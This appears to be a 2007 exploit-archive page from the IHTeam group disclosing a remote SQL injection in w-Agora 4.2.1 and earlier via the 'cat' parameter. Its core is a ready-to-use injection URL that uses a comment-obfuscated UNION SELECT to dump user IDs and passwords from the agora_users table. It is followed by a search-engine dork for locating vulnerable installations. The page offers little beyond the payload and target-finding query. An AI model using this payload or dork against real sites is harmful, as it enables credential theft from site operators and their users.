w-Agora <= 4.2.1 (cat) Remote SQL Injection Vulnerability

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : w-Agora <= 4.2.1 (cat) Remote SQL Injection Vulnerability
# Published : 2007-12-30
# Author : IHTeam
# Previous Title : SanyBee Gallery 0.1.1 (p) Local File Inclusion Vulnerability
# Next Title : jPORTAL 2.3.1 & UserPatch (forum.php) Remote Code Execution Exploit

#########################################################################################
#
#         [W-Agora <= 4.2.1]
#
# Class:     SQL Injection  # Found:     30/12/2007 # Remote:    Yes  # Site:      http://w-agora.net
# Download:  http://sourceforge.net/project/showfiles.php?group_id=3413
# Author:    R00T[ATI]
# Contact:   r00t.ati@ihteam.net - http://www.ihteam.net
#   #########################################################################################

        Exploit :
===================================================================================================================================================================================================================
http://site.com/[w-agora_path]/index.php?site=[site_name]&cat=-1/**/UNION/**/ALL/**/SELECT/**/1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,concat(userid,0x3a,password),24/**/FROM/**/agora_users/*
===================================================================================================================================================================================================================


        Thanks To:
=========================
All ihteam.net members;
=========================

DORK: allinurl:"index.php?site=" "W-Agora"

#ihteam.net - Inclusion Hunter Team 

# www.Syue.com [2007-12-30]